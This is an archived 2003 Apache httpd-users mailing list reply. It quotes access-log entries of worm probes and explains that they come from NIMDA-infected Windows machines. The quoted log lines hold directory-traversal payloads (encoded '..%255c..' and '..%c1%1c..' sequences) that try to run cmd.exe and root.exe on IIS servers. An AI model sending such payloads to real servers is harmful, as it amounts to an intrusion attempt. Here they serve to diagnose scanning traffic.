httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "System" <sys...@eluminoustechnologies.com>
Subject Re: [users@httpd] Crackers
Date Tue, 18 Mar 2003 09:34:09 GMT
Hello,

> This kind of thing(lots of it):
>
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
/MSADC/root.exe?/c+dir
> HTTP/1.0" 404 334 "-" "-"

I am not sure if these are Worms or Virus.

> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 375 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:21 +0000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 375 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:22 +0000] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 391 "-" "-"
> 217.199.107.241 - - [17/Mar/2003:01:49:22 +0000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-"
"-"

For the above No neeed to worry if you are on linux. bcoz these are the
machines that are infected with a Windows virus called NIMDA.they are just
trying to access the sites on your server.That's it.

Regards,
Tina.




---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message